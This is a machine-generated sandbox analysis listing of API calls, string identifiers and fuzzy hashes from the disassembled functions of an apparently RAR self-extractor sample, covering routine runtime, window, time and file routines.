                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0058E58D
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d$t[
                                                                                                                    • API String ID: 2407758923-850499219
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 005ACB66
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC71E
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC730
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC742
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC754
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC766
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC778
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC78A
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC79C
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7AE
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7C0
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7D2
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7E4
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7F6
                                                                                                                    • _free.LIBCMT ref: 005ACB5B
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005ACB7D
                                                                                                                    • _free.LIBCMT ref: 005ACB92
                                                                                                                    • _free.LIBCMT ref: 005ACB9D
                                                                                                                    • _free.LIBCMT ref: 005ACBBF
                                                                                                                    • _free.LIBCMT ref: 005ACBD2
                                                                                                                    • _free.LIBCMT ref: 005ACBE0
                                                                                                                    • _free.LIBCMT ref: 005ACBEB
                                                                                                                    • _free.LIBCMT ref: 005ACC23
                                                                                                                    • _free.LIBCMT ref: 005ACC2A
                                                                                                                    • _free.LIBCMT ref: 005ACC47
                                                                                                                    • _free.LIBCMT ref: 005ACC5F
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID: h[
                                                                                                                    • API String ID: 161543041-2192341851
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005A9705
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005A9711
                                                                                                                    • _free.LIBCMT ref: 005A971C
                                                                                                                    • _free.LIBCMT ref: 005A9727
                                                                                                                    • _free.LIBCMT ref: 005A9732
                                                                                                                    • _free.LIBCMT ref: 005A973D
                                                                                                                    • _free.LIBCMT ref: 005A9748
                                                                                                                    • _free.LIBCMT ref: 005A9753
                                                                                                                    • _free.LIBCMT ref: 005A975E
                                                                                                                    • _free.LIBCMT ref: 005A976C
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: 0d[
                                                                                                                    • API String ID: 776569668-637672029
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00599736
                                                                                                                    • _wcslen.LIBCMT ref: 005997D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 005997E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00599806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0059982D
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: FjunY$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-1435320249
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0059D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0059D6ED
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0059D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0059D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0059D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0059D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0059D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0059D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    • Opcode ID: b9e465b8609ebb2d72c5143b5f27b2d7294500c4e8f35ec149012a29bd981f9c
                                                                                                                    • Instruction ID: 35251bf5f55a029e3c631edfbae6ab01bc529ad01842920aeaaca1105078083b
                                                                                                                    • Opcode Fuzzy Hash: b9e465b8609ebb2d72c5143b5f27b2d7294500c4e8f35ec149012a29bd981f9c
                                                                                                                    • Instruction Fuzzy Hash: D011E7725403617BEB216BB09C8EFAF7E6CFB54751F014120FA81A6091DB648F0956B5
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    • Opcode ID: c02deca1c05cb54f278a31a21d2cac545b3447b2834eec36782edcc50fde0364
                                                                                                                    • Instruction ID: ac71200632187a719d2b3aa18266154f957ef19f8a382f251bc4a14d36078c21
                                                                                                                    • Opcode Fuzzy Hash: c02deca1c05cb54f278a31a21d2cac545b3447b2834eec36782edcc50fde0364
                                                                                                                    • Instruction Fuzzy Hash: 97B18A7180020AEFCF29DFA8C88A9AEBFB5FF46314F14455AF8016B212D771DA51CB91
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nY
                                                                                                                    • API String ID: 3519838083-3775052962
                                                                                                                    • Opcode ID: 9976e39adb175fb1b68c27398893e75d3a459b67511924ca2a4d9ec82ee447c3
                                                                                                                    • Instruction ID: 46288c151d5907c58a31ef8cff62197f2dc06c7db84c1901c902849cf26bae5f
                                                                                                                    • Opcode Fuzzy Hash: 9976e39adb175fb1b68c27398893e75d3a459b67511924ca2a4d9ec82ee447c3
                                                                                                                    • Instruction Fuzzy Hash: 18715D75A00219EFEB14EF64CC999AEBBB9FF48310B14065DF916B72A0CB306E05DB50
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00586FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00587013
                                                                                                                    • _wcslen.LIBCMT ref: 00587084
                                                                                                                      • Part of subcall function 00587A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00587AAB
                                                                                                                      • Part of subcall function 00587A9C: GetLastError.KERNEL32 ref: 00587AF1
                                                                                                                      • Part of subcall function 00587A9C: CloseHandle.KERNEL32(?), ref: 00587B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    • Opcode ID: 930854f63f9476360380635e4446255f276f43680dfcbb51410f617429651fa4
                                                                                                                    • Instruction ID: 90182f24cee6beb62bc251aa03d1aa11490c5f76fb78c1447c3d030209a9def1
                                                                                                                    • Opcode Fuzzy Hash: 930854f63f9476360380635e4446255f276f43680dfcbb51410f617429651fa4
                                                                                                                    • Instruction Fuzzy Hash: 4041E6B1D08749AAEB20F7709C8EFEE7F6CBF49304F100455FD55B6182DA70AA488721
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0059B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0059B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0059B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0059B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0059B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0059B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                    • Opcode ID: 6e2ab5f65429fa41417be789163385c749e3d3b68150248c7f310cd3c50a46c0
                                                                                                                    • Instruction ID: 948eb57dc26500714025432533d8ae52e183e2e6f20aa48c12e036ad0250369d
                                                                                                                    • Opcode Fuzzy Hash: 6e2ab5f65429fa41417be789163385c749e3d3b68150248c7f310cd3c50a46c0
                                                                                                                    • Instruction Fuzzy Hash: 3A21E431204215BBFB255B66FE8DF3B3F6CFB96741F010019F641AA0A0DB52AA05E631
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,AC446398,00000001,00000000,00000000,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0059FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,AC446398,00000001,00000000,00000000,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: be40e4d44194defeb72a8fdf9634125db59628b1996e5adcefbcd6494d2fc00b
                                                                                                                    • Instruction ID: 08a97b7d664700fd119870584608d9ed4860b0b4efbbde586ada28c75704c6e8
                                                                                                                    • Opcode Fuzzy Hash: be40e4d44194defeb72a8fdf9634125db59628b1996e5adcefbcd6494d2fc00b
                                                                                                                    • Instruction Fuzzy Hash: 7D41B7B1A00319ABDF509F68DC49BAEBFACFB44710F244239F915E7291D734A940C7A5
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00589387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 005893AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 005893C9
                                                                                                                      • Part of subcall function 0058C29A: _wcslen.LIBCMT ref: 0058C2A2
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00589465
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 005894D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00589514
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: UY$pY$zY
                                                                                                                    • API String ID: 176396367-954890476
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00599EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00599F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00599FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00599FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00599FF9
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: Y$RarHtmlClassName
                                                                                                                    • API String ID: 3937224194-3908316781
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 0059122E
                                                                                                                      • Part of subcall function 0058B146: GetVersionExW.KERNEL32(?), ref: 0058B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00591251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00591263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00591274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 005912CF
                                                                                                                    • __aullrem.LIBCMT ref: 00591379
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00582536
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,005AFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 005AF6CF
                                                                                                                    • __fassign.LIBCMT ref: 005AF74A
                                                                                                                    • __fassign.LIBCMT ref: 005AF765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 005AF78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,005AFE02,00000000,?,?,?,?,?,?,?,?,?,005AFE02,00000000), ref: 005AF7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,005AFE02,00000000,?,?,?,?,?,?,?,?,?,005AFE02,00000000), ref: 005AF7E3
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0059CE9D
                                                                                                                      • Part of subcall function 0058B690: _wcslen.LIBCMT ref: 0058B696
                                                                                                                    • _swprintf.LIBCMT ref: 0059CED1
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,005C946A), ref: 0059CEF1
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0059CF22
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059CFFE
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A2937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005A293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A29C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005A29F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A2A48
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005AC868: _free.LIBCMT ref: 005AC891
                                                                                                                    • _free.LIBCMT ref: 005AC8F2
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005AC8FD
                                                                                                                    • _free.LIBCMT ref: 005AC908
                                                                                                                    • _free.LIBCMT ref: 005AC95C
                                                                                                                    • _free.LIBCMT ref: 005AC967
                                                                                                                    • _free.LIBCMT ref: 005AC972
                                                                                                                    • _free.LIBCMT ref: 005AC97D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0059E669,0059E5CC,0059E86D), ref: 0059E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0059E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0059E630
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005A891E
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005A8930
                                                                                                                    • _free.LIBCMT ref: 005A8943
                                                                                                                    • _free.LIBCMT ref: 005A8954
                                                                                                                    • _free.LIBCMT ref: 005A8965
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: p[
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 005914C2
                                                                                                                      • Part of subcall function 0058B146: GetVersionExW.KERNEL32(?), ref: 0058B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005914E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00591500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00591513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591533
